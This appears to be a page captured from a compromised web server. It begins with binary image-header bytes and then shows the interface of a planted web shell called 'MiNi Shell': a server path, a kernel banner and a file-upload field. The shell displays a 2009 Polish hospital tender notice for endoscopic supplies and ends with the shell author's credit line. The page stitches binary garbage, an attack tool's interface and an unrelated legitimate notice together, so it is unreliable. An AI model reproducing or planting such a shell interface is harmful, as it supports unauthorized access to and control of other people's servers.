JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20090306/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20090306/53216-N-2009.html

<p class="kh_header"><b>Katowice: Dostawa akcesoriów do zabiegów endoskopowych</b><br>
<b>Numer ogłoszenia: 53216 - 2009; data zamieszczenia: 06.03.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Centralny Szpital Kliniczny im. Prof. Kornela Gibińskiego Śląskiej Akademii Medycznej w Katowicach , ul. Medyków 14, 40-752 Katowice, woj. śląskie, tel. 032 7894131, faks 032 2526727, 7894001-02.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.csk.katowice.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b>  Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa akcesoriów do zabiegów endoskopowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1
1 Igły do ostrzykiwania 230 cm, 2.8 mm, 5 mm, 22 G op (10) 6 Endoskopowa igła jednorazowego użytku, średnica cewnika < 2.8 mm, długość robocza >= 230 cm, długośći igły 5 mm, średnica igły 22 G
2 Klipsownica wielorazowa 230 cm, 2.8mm szt 1	Endoskopowa klipsowanica wielorazowa (z mozliwościa sterylizacji w autoklawie), z funkcja rotacji klipsa, dostosowana do zakładania klipsów ze sterylnych nasadek, średnica narzędzia < 2.8 mm, długość narzędzia >= 230 mm
3 Klipsy endoskopowe 6mm, 90° op (40) 1 Jednorazowe klipsy endoskopowe do klipsownicy o średnicy < 2.8 mm, w sterylnych nasadkach, długość ramion 6 mm, kąt rozwarcia 90° 
4 Klipsy endoskopowe 6mm, 135° op (40) 1 Jednorazowe klipsy endoskopowe do klipsownicy o średnicy < 2.8 mm, w sterylnych nasadkach, długość ramion 6 mm, kąt rozwarcia 135° 
5 Klipsy endoskopowe 8mm, 90° op (40) 1 Jednorazowe klipsy endoskopowe do klipsownicy o średnicy < 2.8 mm, w sterylnych nasadkach, długość ramion 8 mm, kąt rozwarcia 90° 
Pakiet nr 2
1 Zestaw do opaskowania żylaków przełyku  6 opasek szt	40 Urządzenie do opaskowania żylaków przełyku, do endoskopów o średnicach od 9.5 do 13 mm, do kanału roboczego o średnicy min. 2.8 mm, 6 opasek, przedostatnia opaska w innym kolorze niż pozostałe, nasadka przezroczysta
Pakiet nr 3
1 Szczoteczki do czyszczenia endoksopów Op (50 szt.) 1 Szczoteczki do mycia kanałów wewnętrznych endoskopów - jednorazowa szczoteczka do mycia endoskopów o średnicy kanału roboczego 2,0-4,2mm długość szczoteczki całkowita 2200mm z 10mm częścią czyszczącą zakończona kulką
2 Gumki na końcówkę duodenoskopu  Op (2) 2 Gumki, kapturki na końcowy odcinek części roboczej duodenoskopu z czarnej gumy wielorazowe w środku osłonki metalowe wzmocnienie
3 Ustnik autoklawowalny 16 mm szt 10 Ustnik wielorazowy (z możliwością sterylizacji w autoklawie) do endoskopii, średnica otworu 16 mm
Pakiet nr 4
1 Papillotom typu pull wielorazowy 195 cm, 2.2 mm, 30 / 30 mm op (2) 7 Wielorazowy papillotom jednokanałowy typu pull, średnica < 2.2 mm, długość >= 195 cm, długość końcówki dystalnej 30 mm, długość cięciwy 30 mm
2 Balonik do ekstrakcji złogów 200 cm, 6.8 F, 8.5 - 15 mm szt 15 Balonik dwukanałowy do ekstrakcji złogów, średnica 6.8 F, długość >= 200 cm, o zmiennej średnicy od 8.5 do 15 mm, do prowadnicy 0.035
3 Prowadnica 480 cm, 5 hydrofilna, 0.035 szt 10 Prowadnica do ERCP, średnica 0.035, długość 480 cm, pokrycie hydrofilne dystalne 5 cm, końcówka prosta, podwójny system znaczników długości (cm + tzw. Mark V)
4 Osłona metalowa do BML-4Q-1 195 cm, 3.2 mm szt 2 Spiralna osłona metalowa do litotryptera Olympus BML-4Q-1, średnica < 3.2 mm, długośc >= 195 cm
5 Osłona teflonowa do BML-4Q-1 195 cm, 3.2 mm szt 8 Wewnętrzna osłona teflonowa do litotryptera Olympus BML-4Q-1, długość >= 195 cm
6 Koszyk do BML-4Q-1 195 cm, 3.2 mm szt 10 Koszyk do litotryptera Olympus BML-4Q-1, długość >= 195 cm, średnica koszyka 30 mm
7 Uchwyt do BML-4Q-1 szt	1 Uchwyt do litotryptera Olympuys BML-4Q-1
8 Szczypce biopsyjne uchylne 195 cm, 2.8 mm, podanie kontrastu	szt 2 Wielorazowe szczypce biopsyjne do dróg żółciowych z możliwością podania środka kontrastowego, średnica < 2.8 mm, długość >= 195 cm.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.80.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 22.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 3.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Warunkiem ubiegania się przez Wykonawcę o udzielenie zamówienia publicznego jest:
a) posiadanie uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
b) posiadanie niezbędnej wiedzy i doświadczenia oraz dysponowanie potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawienie pisemnego zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
c) znajdowanie się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
d) nie podleganie wykluczeniu z postępowania o udzieleniu zamówienia
Opis oceny  spełnienia warunków:
- przedstawienie wymaganych przez Zamawiającego dokumentów
- wykazanie wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat  przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców (co najmniej 2 zamówienia lub więcej o łącznej wartości odpowiadającej minimum wartości składanej oferty,) oraz załączenia  dokumentów potwierdzających, że dostawy te zostały wykonane należycie,
- złożenie oświadczenia art. 22 ust 1 pkt 1-4 oraz oświadczenia art. 24 ust 1 pkt 1-10 oraz ust.2 pkt. 1-4 ustawy Prawo zamówień publicznych.
Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych, Zamawiający żąda następujących dokumentów:
1.Aktualnego odpisu z właściwego rejestru albo aktualnego zaświadczenia 
o wpisie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składaniem ofert.
2. Aktualnych zaświadczeń właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
W celu potwierdzenia oferowanego przez Zamawiającego warunku posiadania przez Wykonawcę niezbędnej wiedzy i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, Zamawiający żąda następujących dokumentów:
3. Wykaz wykonanych a w przypadku świadczeń okresowych lub ciągłych również wykonywanych dostaw w okresie ostatnich trzech lat  przed
dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom stanowiącym przedmiot zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz załączenia  dokumentów potwierdzających, że dostawy te zostały wykonane należycie.
W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez Zamawiającego, Zamawiający żąda:
Zaświadczenia podmiotu uprawnionego do kontroli jakości, potwierdzające, że dostarczane produkty odpowiadają określonym normom lub specyfikacjom technicznym, tj. dostarczenie  dokumentów dopuszczających zgodnych  z  ustawą z dnia 20.04.2004r. o wyrobach medycznych Dz.U.93 z 2004r. poz. 896 tj. certyfikat CE lub deklaracja zgodności a w przypadku gdy wyrób medyczny jest wprowadzany po raz pierwszy na terenie Polski również wpis do rejestru wyrobów medycznych zgodnie z art. 52 i 54 cytowanej ustawy.
Katalogów lub innych dokumentów zawierających informacje o parametrach, cechach techniczno-użytkowych.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej:
6.1.1 - zamiast dokumentów, o których mowa w pkt 1,2 składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie orzeczono wobec niego  zakazu ubiegania się o zamówienie,
Dokumenty, o których mowa w pkt. 6.1.1 a i b powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę  lub miejsce zamieszkania, nie wydaje się w/w dokumentów oraz dokumentów, o których mowa w pkt 6.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.csk.katowice.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Centralny Szpital Kliniczny im. prof. K. Gibińskiego Śląskiego Uniwersytetu medycznego, ul. Medyków 14, 40-752 Katowice, Dział Zamówień Publicznych.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.03.2009 godzina 09:00, miejsce: Samodzielny Publiczny Centralny Szpital Kliniczny im. prof. K. Gibińskiego Śląskiego Uniwersytetu medycznego, ul. Medyków 14, 40-752 Katowice, kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Igły do ostrzykiwania 230 cm, 2.8 mm, 5 mm, 22 G op (10) 6 Endoskopowa igła jednorazowego użytku, średnica cewnika < 2.8 mm, długość robocza >= 230 cm, długośći igły 5 mm, średnica igły 22 G
2 Klipsownica wielorazowa 230 cm, 2.8mm szt 1 Endoskopowa klipsowanica wielorazowa (z mozliwościa sterylizacji w autoklawie), z funkcja rotacji klipsa, dostosowana do zakładania klipsów ze sterylnych nasadek, średnica narzędzia < 2.8 mm, długość narzędzia >= 230 mm
3 Klipsy endoskopowe 6mm, 90° op (40) 1 Jednorazowe klipsy endoskopowe do klipsownicy o średnicy < 2.8 mm, w sterylnych nasadkach, długość ramion 6 mm, kąt rozwarcia 90° 
4 Klipsy endoskopowe 6mm, 135° op (40) 1 Jednorazowe klipsy endoskopowe do klipsownicy o średnicy < 2.8 mm, w sterylnych nasadkach, długość ramion 6 mm, kąt rozwarcia 135° 
5 Klipsy endoskopowe 8mm, 90° op (40) 1 Jednorazowe klipsy endoskopowe do klipsownicy o średnicy < 2.8 mm, w sterylnych nasadkach, długość ramion 8 mm, kąt rozwarcia 90° 
Zamawiający dopuszcza złożenie ofert na poszczególne pozycje..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.80.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Zestaw do opaskowania żylaków przełyku  6 opasek szt 40 Urządzenie do opaskowania żylaków przełyku, do endoskopów o średnicach od 9.5 do 13 mm, do kanału roboczego o średnicy min. 2.8 mm, 6 opasek, przedostatnia opaska w innym kolorze niż pozostałe, nasadka przezroczysta
Zamawiający dopuszcza złożenie ofert na poszczególne pozycje..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.80.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Szczoteczki do czyszczenia endoksopów Op (50 szt.) 1	Szczoteczki do mycia kanałów wewnętrznych endoskopów - jednorazowa szczoteczka do mycia endoskopów o średnicy kanału roboczego 2,0-4,2mm długość szczoteczki całkowita 2200mm z 10mm częścią czyszczącą zakończona kulką
2 Gumki na końcówkę duodenoskopu Op (2) 2 Gumki, kapturki na końcowy odcinek części roboczej duodenoskopu z czarnej gumy wielorazowe w środku osłonki metalowe wzmocnienie
3 Ustnik autoklawowalny 16 mm szt 10 Ustnik wielorazowy (z możliwością sterylizacji w autoklawie) do endoskopii, średnica otworu 16 mm
Zamawiajacy dopuszcza złożenia ofert na poszczególne pozycje..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.80.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Papillotom typu pull wielorazowy 195 cm, 2.2 mm, 30 / 30 mm op (2) 7 Wielorazowy papillotom jednokanałowy typu pull, średnica < 2.2 mm, długość >= 195 cm, długość końcówki dystalnej 30 mm, długość cięciwy 30 mm
2 Balonik do ekstrakcji złogów  200 cm, 6.8 F, 8.5 - 15 mm szt 15	Balonik dwukanałowy do ekstrakcji złogów, średnica 6.8 F, długość >= 200 cm, o zmiennej średnicy od 8.5 do 15 mm, do prowadnicy 0.035
3 Prowadnica 480 cm, 5 hydrofilna, 0.035 szt 10 Prowadnica do ERCP, średnica 0.035, długość 480 cm, pokrycie hydrofilne dystalne 5 cm, końcówka prosta, podwójny system znaczników długości (cm + tzw. Mark V)
4 Osłona metalowa do BML-4Q-1 195 cm, 3.2 mm szt 2 Spiralna osłona metalowa do litotryptera Olympus BML-4Q-1, średnica < 3.2 mm, długośc >= 195 cm
5 Osłona teflonowa do BML-4Q-1 195 cm, 3.2 mm szt 8 Wewnętrzna osłona teflonowa do litotryptera Olympus BML-4Q-1, długość >= 195 cm
6 Koszyk do BML-4Q-1 195 cm, 3.2 mm szt 10 Koszyk do litotryptera Olympus BML-4Q-1, długość >= 195 cm, średnica koszyka 30 mm
7 Uchwyt do BML-4Q-1 szt 1 Uchwyt do litotryptera Olympuys BML-4Q-1
8 Szczypce biopsyjne uchylne 195 cm, 2.8 mm, podanie kontrastu	szt 2 Wielorazowe szczypce biopsyjne do dróg żółciowych z możliwością podania środka kontrastowego, średnica < 2.8 mm, długość >= 195 cm
Zamawiający dopuszcza złożenie ofert na poszczególne pozycje..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.80.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1 Protezy Amsterdam 8.5F 9 cm 8.5 F, 9 cm szt	10 Plastikowa proteza prosta do dróg żółciowych typu Amsterdam, średnica 8.5 F, długość 9 cm
2 Protezy Amsterdam 8.5F 12 cm 8.5 F, 12 cm	szt 10 Plastikowa proteza prosta do dróg żółciowych typu Amsterdam, średnica 8.5 F, długość 12 cm
3 Protezy Amsterdam 8.5F 15 cm 8.5 F, 15 cm	szt 5 Plastikowa proteza prosta do dróg żółciowych typu Amsterdam, średnica 8.5 F, długość 15 cm
4 Protezy Amsterdam 10F 7 cm 10 F, 7 cm szt 10 Plastikowa proteza prosta do dróg żółciowych typu Amsterdam, średnica 10 F, długość 7 cm
5 Cewnik (dilatator) 6 F, 220 cm, opaska cieniująca  szt	4 Cewnik prowadzący do dróg żółciowych, średnica 6 F, długość >= 220 cm, opaska cieniująca na końcu
Zamawiajacy dopuszcza złozenie ofert na poszczególne pozycje.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.16.80.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com